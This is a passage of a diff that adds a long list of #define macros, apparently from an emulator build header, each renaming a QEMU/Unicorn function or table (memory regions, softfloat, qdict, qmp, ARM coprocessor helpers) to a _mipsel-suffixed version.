helper_vfp_touqd_mipsel +#define helper_vfp_touqs helper_vfp_touqs_mipsel +#define helper_vfp_uhtod helper_vfp_uhtod_mipsel +#define helper_vfp_uhtos helper_vfp_uhtos_mipsel +#define helper_vfp_uitod helper_vfp_uitod_mipsel +#define helper_vfp_uitos helper_vfp_uitos_mipsel +#define helper_vfp_ultod helper_vfp_ultod_mipsel +#define helper_vfp_ultos helper_vfp_ultos_mipsel +#define helper_vfp_uqtod helper_vfp_uqtod_mipsel +#define helper_vfp_uqtos helper_vfp_uqtos_mipsel +#define helper_wfe helper_wfe_mipsel +#define helper_wfi helper_wfi_mipsel +#define hex2decimal hex2decimal_mipsel +#define hw_breakpoint_update hw_breakpoint_update_mipsel +#define hw_breakpoint_update_all hw_breakpoint_update_all_mipsel +#define hw_watchpoint_update hw_watchpoint_update_mipsel +#define hw_watchpoint_update_all hw_watchpoint_update_all_mipsel +#define _init _init_mipsel +#define init_cpreg_list init_cpreg_list_mipsel +#define init_lists init_lists_mipsel +#define input_type_enum input_type_enum_mipsel +#define int128_2_64 int128_2_64_mipsel +#define int128_add int128_add_mipsel +#define int128_addto int128_addto_mipsel +#define int128_and int128_and_mipsel +#define int128_eq int128_eq_mipsel +#define int128_ge int128_ge_mipsel +#define int128_get64 int128_get64_mipsel +#define int128_gt int128_gt_mipsel +#define int128_le int128_le_mipsel +#define int128_lt int128_lt_mipsel +#define int128_make64 int128_make64_mipsel +#define int128_max int128_max_mipsel +#define int128_min int128_min_mipsel +#define int128_ne int128_ne_mipsel +#define int128_neg int128_neg_mipsel +#define int128_nz int128_nz_mipsel +#define int128_rshift int128_rshift_mipsel +#define int128_sub int128_sub_mipsel +#define int128_subfrom int128_subfrom_mipsel +#define int128_zero int128_zero_mipsel +#define int16_to_float32 int16_to_float32_mipsel +#define int16_to_float64 int16_to_float64_mipsel +#define int32_to_float128 int32_to_float128_mipsel +#define int32_to_float32 int32_to_float32_mipsel +#define 
int32_to_float64 int32_to_float64_mipsel +#define int32_to_floatx80 int32_to_floatx80_mipsel +#define int64_to_float128 int64_to_float128_mipsel +#define int64_to_float32 int64_to_float32_mipsel +#define int64_to_float64 int64_to_float64_mipsel +#define int64_to_floatx80 int64_to_floatx80_mipsel +#define invalidate_and_set_dirty invalidate_and_set_dirty_mipsel +#define invalidate_page_bitmap invalidate_page_bitmap_mipsel +#define io_mem_read io_mem_read_mipsel +#define io_mem_write io_mem_write_mipsel +#define io_readb io_readb_mipsel +#define io_readl io_readl_mipsel +#define io_readq io_readq_mipsel +#define io_readw io_readw_mipsel +#define iotlb_to_region iotlb_to_region_mipsel +#define io_writeb io_writeb_mipsel +#define io_writel io_writel_mipsel +#define io_writeq io_writeq_mipsel +#define io_writew io_writew_mipsel +#define is_a64 is_a64_mipsel +#define is_help_option is_help_option_mipsel +#define isr_read isr_read_mipsel +#define is_valid_option_list is_valid_option_list_mipsel +#define iwmmxt_load_creg iwmmxt_load_creg_mipsel +#define iwmmxt_load_reg iwmmxt_load_reg_mipsel +#define iwmmxt_store_creg iwmmxt_store_creg_mipsel +#define iwmmxt_store_reg iwmmxt_store_reg_mipsel +#define __jit_debug_descriptor __jit_debug_descriptor_mipsel +#define __jit_debug_register_code __jit_debug_register_code_mipsel +#define kvm_to_cpreg_id kvm_to_cpreg_id_mipsel +#define last_ram_offset last_ram_offset_mipsel +#define ldl_be_p ldl_be_p_mipsel +#define ldl_be_phys ldl_be_phys_mipsel +#define ldl_he_p ldl_he_p_mipsel +#define ldl_le_p ldl_le_p_mipsel +#define ldl_le_phys ldl_le_phys_mipsel +#define ldl_phys ldl_phys_mipsel +#define ldl_phys_internal ldl_phys_internal_mipsel +#define ldq_be_p ldq_be_p_mipsel +#define ldq_be_phys ldq_be_phys_mipsel +#define ldq_he_p ldq_he_p_mipsel +#define ldq_le_p ldq_le_p_mipsel +#define ldq_le_phys ldq_le_phys_mipsel +#define ldq_phys ldq_phys_mipsel +#define ldq_phys_internal ldq_phys_internal_mipsel +#define ldst_name 
ldst_name_mipsel +#define ldub_p ldub_p_mipsel +#define ldub_phys ldub_phys_mipsel +#define lduw_be_p lduw_be_p_mipsel +#define lduw_be_phys lduw_be_phys_mipsel +#define lduw_he_p lduw_he_p_mipsel +#define lduw_le_p lduw_le_p_mipsel +#define lduw_le_phys lduw_le_phys_mipsel +#define lduw_phys lduw_phys_mipsel +#define lduw_phys_internal lduw_phys_internal_mipsel +#define le128 le128_mipsel +#define linked_bp_matches linked_bp_matches_mipsel +#define listener_add_address_space listener_add_address_space_mipsel +#define load_cpu_offset load_cpu_offset_mipsel +#define load_reg load_reg_mipsel +#define load_reg_var load_reg_var_mipsel +#define log_cpu_state log_cpu_state_mipsel +#define lpae_cp_reginfo lpae_cp_reginfo_mipsel +#define lt128 lt128_mipsel +#define machine_class_init machine_class_init_mipsel +#define machine_finalize machine_finalize_mipsel +#define machine_info machine_info_mipsel +#define machine_initfn machine_initfn_mipsel +#define machine_register_types machine_register_types_mipsel +#define machvirt_init machvirt_init_mipsel +#define machvirt_machine_init machvirt_machine_init_mipsel +#define maj maj_mipsel +#define mapping_conflict mapping_conflict_mipsel +#define mapping_contiguous mapping_contiguous_mipsel +#define mapping_have_same_region mapping_have_same_region_mipsel +#define mapping_merge mapping_merge_mipsel +#define mem_add mem_add_mipsel +#define mem_begin mem_begin_mipsel +#define mem_commit mem_commit_mipsel +#define memory_access_is_direct memory_access_is_direct_mipsel +#define memory_access_size memory_access_size_mipsel +#define memory_init memory_init_mipsel +#define memory_listener_match memory_listener_match_mipsel +#define memory_listener_register memory_listener_register_mipsel +#define memory_listener_unregister memory_listener_unregister_mipsel +#define memory_map_init memory_map_init_mipsel +#define memory_mapping_filter memory_mapping_filter_mipsel +#define memory_mapping_list_add_mapping_sorted 
memory_mapping_list_add_mapping_sorted_mipsel +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mipsel +#define memory_mapping_list_free memory_mapping_list_free_mipsel +#define memory_mapping_list_init memory_mapping_list_init_mipsel +#define memory_region_access_valid memory_region_access_valid_mipsel +#define memory_region_add_subregion memory_region_add_subregion_mipsel +#define memory_region_add_subregion_common memory_region_add_subregion_common_mipsel +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mipsel +#define memory_region_big_endian memory_region_big_endian_mipsel +#define memory_region_clear_pending memory_region_clear_pending_mipsel +#define memory_region_del_subregion memory_region_del_subregion_mipsel +#define memory_region_destructor_alias memory_region_destructor_alias_mipsel +#define memory_region_destructor_none memory_region_destructor_none_mipsel +#define memory_region_destructor_ram memory_region_destructor_ram_mipsel +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_mipsel +#define memory_region_dispatch_read memory_region_dispatch_read_mipsel +#define memory_region_dispatch_read1 memory_region_dispatch_read1_mipsel +#define memory_region_dispatch_write memory_region_dispatch_write_mipsel +#define memory_region_escape_name memory_region_escape_name_mipsel +#define memory_region_finalize memory_region_finalize_mipsel +#define memory_region_find memory_region_find_mipsel +#define memory_region_get_addr memory_region_get_addr_mipsel +#define memory_region_get_alignment memory_region_get_alignment_mipsel +#define memory_region_get_container memory_region_get_container_mipsel +#define memory_region_get_fd memory_region_get_fd_mipsel +#define memory_region_get_may_overlap memory_region_get_may_overlap_mipsel +#define memory_region_get_priority memory_region_get_priority_mipsel +#define memory_region_get_ram_addr memory_region_get_ram_addr_mipsel 
+#define memory_region_get_ram_ptr memory_region_get_ram_ptr_mipsel +#define memory_region_get_size memory_region_get_size_mipsel +#define memory_region_info memory_region_info_mipsel +#define memory_region_init memory_region_init_mipsel +#define memory_region_init_alias memory_region_init_alias_mipsel +#define memory_region_initfn memory_region_initfn_mipsel +#define memory_region_init_io memory_region_init_io_mipsel +#define memory_region_init_ram memory_region_init_ram_mipsel +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_mipsel +#define memory_region_init_reservation memory_region_init_reservation_mipsel +#define memory_region_is_iommu memory_region_is_iommu_mipsel +#define memory_region_is_logging memory_region_is_logging_mipsel +#define memory_region_is_mapped memory_region_is_mapped_mipsel +#define memory_region_is_ram memory_region_is_ram_mipsel +#define memory_region_is_rom memory_region_is_rom_mipsel +#define memory_region_is_romd memory_region_is_romd_mipsel +#define memory_region_is_skip_dump memory_region_is_skip_dump_mipsel +#define memory_region_is_unassigned memory_region_is_unassigned_mipsel +#define memory_region_name memory_region_name_mipsel +#define memory_region_need_escape memory_region_need_escape_mipsel +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_mipsel +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_mipsel +#define memory_region_present memory_region_present_mipsel +#define memory_region_read_accessor memory_region_read_accessor_mipsel +#define memory_region_readd_subregion memory_region_readd_subregion_mipsel +#define memory_region_ref memory_region_ref_mipsel +#define memory_region_resolve_container memory_region_resolve_container_mipsel +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_mipsel +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_mipsel +#define memory_region_set_address 
memory_region_set_address_mipsel +#define memory_region_set_alias_offset memory_region_set_alias_offset_mipsel +#define memory_region_set_enabled memory_region_set_enabled_mipsel +#define memory_region_set_readonly memory_region_set_readonly_mipsel +#define memory_region_set_skip_dump memory_region_set_skip_dump_mipsel +#define memory_region_size memory_region_size_mipsel +#define memory_region_to_address_space memory_region_to_address_space_mipsel +#define memory_region_transaction_begin memory_region_transaction_begin_mipsel +#define memory_region_transaction_commit memory_region_transaction_commit_mipsel +#define memory_region_unref memory_region_unref_mipsel +#define memory_region_update_container_subregions memory_region_update_container_subregions_mipsel +#define memory_region_write_accessor memory_region_write_accessor_mipsel +#define memory_region_wrong_endianness memory_region_wrong_endianness_mipsel +#define memory_try_enable_merging memory_try_enable_merging_mipsel +#define module_call_init module_call_init_mipsel +#define module_load module_load_mipsel +#define mpidr_cp_reginfo mpidr_cp_reginfo_mipsel +#define mpidr_read mpidr_read_mipsel +#define msr_mask msr_mask_mipsel +#define mul128By64To192 mul128By64To192_mipsel +#define mul128To256 mul128To256_mipsel +#define mul64To128 mul64To128_mipsel +#define muldiv64 muldiv64_mipsel +#define neon_2rm_is_float_op neon_2rm_is_float_op_mipsel +#define neon_2rm_sizes neon_2rm_sizes_mipsel +#define neon_3r_sizes neon_3r_sizes_mipsel +#define neon_get_scalar neon_get_scalar_mipsel +#define neon_load_reg neon_load_reg_mipsel +#define neon_load_reg64 neon_load_reg64_mipsel +#define neon_load_scratch neon_load_scratch_mipsel +#define neon_ls_element_type neon_ls_element_type_mipsel +#define neon_reg_offset neon_reg_offset_mipsel +#define neon_store_reg neon_store_reg_mipsel +#define neon_store_reg64 neon_store_reg64_mipsel +#define neon_store_scratch neon_store_scratch_mipsel +#define new_ldst_label 
new_ldst_label_mipsel +#define next_list next_list_mipsel +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_mipsel +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_mipsel +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_mipsel +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_mipsel +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mipsel +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_mipsel +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_mipsel +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_mipsel +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mipsel +#define not_v6_cp_reginfo not_v6_cp_reginfo_mipsel +#define not_v7_cp_reginfo not_v7_cp_reginfo_mipsel +#define not_v8_cp_reginfo not_v8_cp_reginfo_mipsel +#define object_child_foreach object_child_foreach_mipsel +#define object_class_foreach object_class_foreach_mipsel +#define object_class_foreach_tramp object_class_foreach_tramp_mipsel +#define object_class_get_list object_class_get_list_mipsel +#define object_class_get_list_tramp object_class_get_list_tramp_mipsel +#define object_class_get_parent object_class_get_parent_mipsel +#define object_deinit object_deinit_mipsel +#define object_dynamic_cast object_dynamic_cast_mipsel +#define object_finalize object_finalize_mipsel +#define object_finalize_child_property object_finalize_child_property_mipsel +#define object_get_child_property object_get_child_property_mipsel +#define object_get_link_property object_get_link_property_mipsel +#define object_get_root object_get_root_mipsel +#define object_initialize_with_type object_initialize_with_type_mipsel +#define object_init_with_type object_init_with_type_mipsel +#define object_instance_init object_instance_init_mipsel +#define object_new_with_type object_new_with_type_mipsel +#define object_post_init_with_type object_post_init_with_type_mipsel +#define 
object_property_add_alias object_property_add_alias_mipsel +#define object_property_add_link object_property_add_link_mipsel +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_mipsel +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_mipsel +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_mipsel +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_mipsel +#define object_property_allow_set_link object_property_allow_set_link_mipsel +#define object_property_del object_property_del_mipsel +#define object_property_del_all object_property_del_all_mipsel +#define object_property_find object_property_find_mipsel +#define object_property_get object_property_get_mipsel +#define object_property_get_bool object_property_get_bool_mipsel +#define object_property_get_int object_property_get_int_mipsel +#define object_property_get_link object_property_get_link_mipsel +#define object_property_get_qobject object_property_get_qobject_mipsel +#define object_property_get_str object_property_get_str_mipsel +#define object_property_get_type object_property_get_type_mipsel +#define object_property_is_child object_property_is_child_mipsel +#define object_property_set object_property_set_mipsel +#define object_property_set_description object_property_set_description_mipsel +#define object_property_set_link object_property_set_link_mipsel +#define object_property_set_qobject object_property_set_qobject_mipsel +#define object_release_link_property object_release_link_property_mipsel +#define object_resolve_abs_path object_resolve_abs_path_mipsel +#define object_resolve_child_property object_resolve_child_property_mipsel +#define object_resolve_link object_resolve_link_mipsel +#define object_resolve_link_property object_resolve_link_property_mipsel +#define object_resolve_partial_path object_resolve_partial_path_mipsel +#define object_resolve_path object_resolve_path_mipsel +#define object_resolve_path_component 
object_resolve_path_component_mipsel +#define object_resolve_path_type object_resolve_path_type_mipsel +#define object_set_link_property object_set_link_property_mipsel +#define object_unparent object_unparent_mipsel +#define omap_cachemaint_write omap_cachemaint_write_mipsel +#define omap_cp_reginfo omap_cp_reginfo_mipsel +#define omap_threadid_write omap_threadid_write_mipsel +#define omap_ticonfig_write omap_ticonfig_write_mipsel +#define omap_wfi_write omap_wfi_write_mipsel +#define op_bits op_bits_mipsel +#define open_modeflags open_modeflags_mipsel +#define op_to_mov op_to_mov_mipsel +#define op_to_movi op_to_movi_mipsel +#define output_type_enum output_type_enum_mipsel +#define packFloat128 packFloat128_mipsel +#define packFloat16 packFloat16_mipsel +#define packFloat32 packFloat32_mipsel +#define packFloat64 packFloat64_mipsel +#define packFloatx80 packFloatx80_mipsel +#define page_find page_find_mipsel +#define page_find_alloc page_find_alloc_mipsel +#define page_flush_tb page_flush_tb_mipsel +#define page_flush_tb_1 page_flush_tb_1_mipsel +#define page_init page_init_mipsel +#define page_size_init page_size_init_mipsel +#define par par_mipsel +#define parse_array parse_array_mipsel +#define parse_error parse_error_mipsel +#define parse_escape parse_escape_mipsel +#define parse_keyword parse_keyword_mipsel +#define parse_literal parse_literal_mipsel +#define parse_object parse_object_mipsel +#define parse_optional parse_optional_mipsel +#define parse_option_bool parse_option_bool_mipsel +#define parse_option_number parse_option_number_mipsel +#define parse_option_size parse_option_size_mipsel +#define parse_pair parse_pair_mipsel +#define parser_context_free parser_context_free_mipsel +#define parser_context_new parser_context_new_mipsel +#define parser_context_peek_token parser_context_peek_token_mipsel +#define parser_context_pop_token parser_context_pop_token_mipsel +#define parser_context_restore parser_context_restore_mipsel +#define 
parser_context_save parser_context_save_mipsel +#define parse_str parse_str_mipsel +#define parse_type_bool parse_type_bool_mipsel +#define parse_type_int parse_type_int_mipsel +#define parse_type_number parse_type_number_mipsel +#define parse_type_size parse_type_size_mipsel +#define parse_type_str parse_type_str_mipsel +#define parse_value parse_value_mipsel +#define par_write par_write_mipsel +#define patch_reloc patch_reloc_mipsel +#define phys_map_node_alloc phys_map_node_alloc_mipsel +#define phys_map_node_reserve phys_map_node_reserve_mipsel +#define phys_mem_alloc phys_mem_alloc_mipsel +#define phys_mem_set_alloc phys_mem_set_alloc_mipsel +#define phys_page_compact phys_page_compact_mipsel +#define phys_page_compact_all phys_page_compact_all_mipsel +#define phys_page_find phys_page_find_mipsel +#define phys_page_set phys_page_set_mipsel +#define phys_page_set_level phys_page_set_level_mipsel +#define phys_section_add phys_section_add_mipsel +#define phys_section_destroy phys_section_destroy_mipsel +#define phys_sections_free phys_sections_free_mipsel +#define pickNaN pickNaN_mipsel +#define pickNaNMulAdd pickNaNMulAdd_mipsel +#define pmccfiltr_write pmccfiltr_write_mipsel +#define pmccntr_read pmccntr_read_mipsel +#define pmccntr_sync pmccntr_sync_mipsel +#define pmccntr_write pmccntr_write_mipsel +#define pmccntr_write32 pmccntr_write32_mipsel +#define pmcntenclr_write pmcntenclr_write_mipsel +#define pmcntenset_write pmcntenset_write_mipsel +#define pmcr_write pmcr_write_mipsel +#define pmintenclr_write pmintenclr_write_mipsel +#define pmintenset_write pmintenset_write_mipsel +#define pmovsr_write pmovsr_write_mipsel +#define pmreg_access pmreg_access_mipsel +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_mipsel +#define pmsav5_data_ap_read pmsav5_data_ap_read_mipsel +#define pmsav5_data_ap_write pmsav5_data_ap_write_mipsel +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_mipsel +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_mipsel +#define 
pmuserenr_write pmuserenr_write_mipsel +#define pmxevtyper_write pmxevtyper_write_mipsel +#define print_type_bool print_type_bool_mipsel +#define print_type_int print_type_int_mipsel +#define print_type_number print_type_number_mipsel +#define print_type_size print_type_size_mipsel +#define print_type_str print_type_str_mipsel +#define propagateFloat128NaN propagateFloat128NaN_mipsel +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_mipsel +#define propagateFloat32NaN propagateFloat32NaN_mipsel +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_mipsel +#define propagateFloat64NaN propagateFloat64NaN_mipsel +#define propagateFloatx80NaN propagateFloatx80NaN_mipsel +#define property_get_alias property_get_alias_mipsel +#define property_get_bool property_get_bool_mipsel +#define property_get_str property_get_str_mipsel +#define property_get_uint16_ptr property_get_uint16_ptr_mipsel +#define property_get_uint32_ptr property_get_uint32_ptr_mipsel +#define property_get_uint64_ptr property_get_uint64_ptr_mipsel +#define property_get_uint8_ptr property_get_uint8_ptr_mipsel +#define property_release_alias property_release_alias_mipsel +#define property_release_bool property_release_bool_mipsel +#define property_release_str property_release_str_mipsel +#define property_resolve_alias property_resolve_alias_mipsel +#define property_set_alias property_set_alias_mipsel +#define property_set_bool property_set_bool_mipsel +#define property_set_str property_set_str_mipsel +#define pstate_read pstate_read_mipsel +#define pstate_write pstate_write_mipsel +#define pxa250_initfn pxa250_initfn_mipsel +#define pxa255_initfn pxa255_initfn_mipsel +#define pxa260_initfn pxa260_initfn_mipsel +#define pxa261_initfn pxa261_initfn_mipsel +#define pxa262_initfn pxa262_initfn_mipsel +#define pxa270a0_initfn pxa270a0_initfn_mipsel +#define pxa270a1_initfn pxa270a1_initfn_mipsel +#define pxa270b0_initfn pxa270b0_initfn_mipsel +#define pxa270b1_initfn pxa270b1_initfn_mipsel 
+#define pxa270c0_initfn pxa270c0_initfn_mipsel +#define pxa270c5_initfn pxa270c5_initfn_mipsel +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_mipsel +#define qapi_dealloc_end_list qapi_dealloc_end_list_mipsel +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_mipsel +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_mipsel +#define qapi_dealloc_next_list qapi_dealloc_next_list_mipsel +#define qapi_dealloc_pop qapi_dealloc_pop_mipsel +#define qapi_dealloc_push qapi_dealloc_push_mipsel +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_mipsel +#define qapi_dealloc_start_list qapi_dealloc_start_list_mipsel +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_mipsel +#define qapi_dealloc_start_union qapi_dealloc_start_union_mipsel +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_mipsel +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_mipsel +#define qapi_dealloc_type_int qapi_dealloc_type_int_mipsel +#define qapi_dealloc_type_number qapi_dealloc_type_number_mipsel +#define qapi_dealloc_type_size qapi_dealloc_type_size_mipsel +#define qapi_dealloc_type_str qapi_dealloc_type_str_mipsel +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_mipsel +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_mipsel +#define qapi_free_boolList qapi_free_boolList_mipsel +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_mipsel +#define qapi_free_int16List qapi_free_int16List_mipsel +#define qapi_free_int32List qapi_free_int32List_mipsel +#define qapi_free_int64List qapi_free_int64List_mipsel +#define qapi_free_int8List qapi_free_int8List_mipsel +#define qapi_free_intList qapi_free_intList_mipsel +#define qapi_free_numberList qapi_free_numberList_mipsel +#define qapi_free_strList qapi_free_strList_mipsel +#define qapi_free_uint16List qapi_free_uint16List_mipsel +#define qapi_free_uint32List qapi_free_uint32List_mipsel +#define qapi_free_uint64List 
qapi_free_uint64List_mipsel +#define qapi_free_uint8List qapi_free_uint8List_mipsel +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_mipsel +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_mipsel +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_mipsel +#define qbool_destroy_obj qbool_destroy_obj_mipsel +#define qbool_from_int qbool_from_int_mipsel +#define qbool_get_int qbool_get_int_mipsel +#define qbool_type qbool_type_mipsel +#define qbus_create qbus_create_mipsel +#define qbus_create_inplace qbus_create_inplace_mipsel +#define qbus_finalize qbus_finalize_mipsel +#define qbus_initfn qbus_initfn_mipsel +#define qbus_realize qbus_realize_mipsel +#define qdev_create qdev_create_mipsel +#define qdev_get_type qdev_get_type_mipsel +#define qdev_register_types qdev_register_types_mipsel +#define qdev_set_parent_bus qdev_set_parent_bus_mipsel +#define qdev_try_create qdev_try_create_mipsel +#define qdict_add_key qdict_add_key_mipsel +#define qdict_array_split qdict_array_split_mipsel +#define qdict_clone_shallow qdict_clone_shallow_mipsel +#define qdict_del qdict_del_mipsel +#define qdict_destroy_obj qdict_destroy_obj_mipsel +#define qdict_entry_key qdict_entry_key_mipsel +#define qdict_entry_value qdict_entry_value_mipsel +#define qdict_extract_subqdict qdict_extract_subqdict_mipsel +#define qdict_find qdict_find_mipsel +#define qdict_first qdict_first_mipsel +#define qdict_flatten qdict_flatten_mipsel +#define qdict_flatten_qdict qdict_flatten_qdict_mipsel +#define qdict_flatten_qlist qdict_flatten_qlist_mipsel +#define qdict_get qdict_get_mipsel +#define qdict_get_bool qdict_get_bool_mipsel +#define qdict_get_double qdict_get_double_mipsel +#define qdict_get_int qdict_get_int_mipsel +#define qdict_get_obj qdict_get_obj_mipsel +#define qdict_get_qdict qdict_get_qdict_mipsel +#define qdict_get_qlist qdict_get_qlist_mipsel +#define qdict_get_str qdict_get_str_mipsel +#define qdict_get_try_bool 
qdict_get_try_bool_mipsel +#define qdict_get_try_int qdict_get_try_int_mipsel +#define qdict_get_try_str qdict_get_try_str_mipsel +#define qdict_haskey qdict_haskey_mipsel +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_mipsel +#define qdict_iter qdict_iter_mipsel +#define qdict_join qdict_join_mipsel +#define qdict_new qdict_new_mipsel +#define qdict_next qdict_next_mipsel +#define qdict_next_entry qdict_next_entry_mipsel +#define qdict_put_obj qdict_put_obj_mipsel +#define qdict_size qdict_size_mipsel +#define qdict_type qdict_type_mipsel +#define qemu_clock_get_us qemu_clock_get_us_mipsel +#define qemu_clock_ptr qemu_clock_ptr_mipsel +#define qemu_clocks qemu_clocks_mipsel +#define qemu_get_cpu qemu_get_cpu_mipsel +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_mipsel +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_mipsel +#define qemu_get_ram_block qemu_get_ram_block_mipsel +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_mipsel +#define qemu_get_ram_fd qemu_get_ram_fd_mipsel +#define qemu_get_ram_ptr qemu_get_ram_ptr_mipsel +#define qemu_host_page_mask qemu_host_page_mask_mipsel +#define qemu_host_page_size qemu_host_page_size_mipsel +#define qemu_init_vcpu qemu_init_vcpu_mipsel +#define qemu_ld_helpers qemu_ld_helpers_mipsel +#define qemu_log_close qemu_log_close_mipsel +#define qemu_log_enabled qemu_log_enabled_mipsel +#define qemu_log_flush qemu_log_flush_mipsel +#define qemu_loglevel_mask qemu_loglevel_mask_mipsel +#define qemu_log_vprintf qemu_log_vprintf_mipsel +#define qemu_oom_check qemu_oom_check_mipsel +#define qemu_parse_fd qemu_parse_fd_mipsel +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_mipsel +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_mipsel +#define qemu_ram_alloc qemu_ram_alloc_mipsel +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mipsel +#define qemu_ram_foreach_block qemu_ram_foreach_block_mipsel +#define 
qemu_ram_free qemu_ram_free_mipsel +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_mipsel +#define qemu_ram_ptr_length qemu_ram_ptr_length_mipsel +#define qemu_ram_remap qemu_ram_remap_mipsel +#define qemu_ram_setup_dump qemu_ram_setup_dump_mipsel +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_mipsel +#define qemu_real_host_page_size qemu_real_host_page_size_mipsel +#define qemu_st_helpers qemu_st_helpers_mipsel +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_mipsel +#define qemu_try_memalign qemu_try_memalign_mipsel +#define qentry_destroy qentry_destroy_mipsel +#define qerror_human qerror_human_mipsel +#define qerror_report qerror_report_mipsel +#define qerror_report_err qerror_report_err_mipsel +#define qfloat_destroy_obj qfloat_destroy_obj_mipsel +#define qfloat_from_double qfloat_from_double_mipsel +#define qfloat_get_double qfloat_get_double_mipsel +#define qfloat_type qfloat_type_mipsel +#define qint_destroy_obj qint_destroy_obj_mipsel +#define qint_from_int qint_from_int_mipsel +#define qint_get_int qint_get_int_mipsel +#define qint_type qint_type_mipsel +#define qlist_append_obj qlist_append_obj_mipsel +#define qlist_copy qlist_copy_mipsel +#define qlist_copy_elem qlist_copy_elem_mipsel +#define qlist_destroy_obj qlist_destroy_obj_mipsel +#define qlist_empty qlist_empty_mipsel +#define qlist_entry_obj qlist_entry_obj_mipsel +#define qlist_first qlist_first_mipsel +#define qlist_iter qlist_iter_mipsel +#define qlist_new qlist_new_mipsel +#define qlist_next qlist_next_mipsel +#define qlist_peek qlist_peek_mipsel +#define qlist_pop qlist_pop_mipsel +#define qlist_size qlist_size_mipsel +#define qlist_size_iter qlist_size_iter_mipsel +#define qlist_type qlist_type_mipsel +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_mipsel +#define qmp_input_end_list qmp_input_end_list_mipsel +#define qmp_input_end_struct qmp_input_end_struct_mipsel +#define qmp_input_get_next_type qmp_input_get_next_type_mipsel +#define qmp_input_get_object 
qmp_input_get_object_mipsel +#define qmp_input_get_visitor qmp_input_get_visitor_mipsel +#define qmp_input_next_list qmp_input_next_list_mipsel +#define qmp_input_optional qmp_input_optional_mipsel +#define qmp_input_pop qmp_input_pop_mipsel +#define qmp_input_push qmp_input_push_mipsel +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_mipsel +#define qmp_input_start_list qmp_input_start_list_mipsel +#define qmp_input_start_struct qmp_input_start_struct_mipsel +#define qmp_input_type_bool qmp_input_type_bool_mipsel +#define qmp_input_type_int qmp_input_type_int_mipsel +#define qmp_input_type_number qmp_input_type_number_mipsel +#define qmp_input_type_str qmp_input_type_str_mipsel +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_mipsel +#define qmp_input_visitor_new qmp_input_visitor_new_mipsel +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_mipsel +#define qmp_output_add_obj qmp_output_add_obj_mipsel +#define qmp_output_end_list qmp_output_end_list_mipsel +#define qmp_output_end_struct qmp_output_end_struct_mipsel +#define qmp_output_first qmp_output_first_mipsel +#define qmp_output_get_qobject qmp_output_get_qobject_mipsel +#define qmp_output_get_visitor qmp_output_get_visitor_mipsel +#define qmp_output_last qmp_output_last_mipsel +#define qmp_output_next_list qmp_output_next_list_mipsel +#define qmp_output_pop qmp_output_pop_mipsel +#define qmp_output_push_obj qmp_output_push_obj_mipsel +#define qmp_output_start_list qmp_output_start_list_mipsel +#define qmp_output_start_struct qmp_output_start_struct_mipsel +#define qmp_output_type_bool qmp_output_type_bool_mipsel +#define qmp_output_type_int qmp_output_type_int_mipsel +#define qmp_output_type_number qmp_output_type_number_mipsel +#define qmp_output_type_str qmp_output_type_str_mipsel +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_mipsel +#define qmp_output_visitor_new qmp_output_visitor_new_mipsel +#define qobject_decref qobject_decref_mipsel 
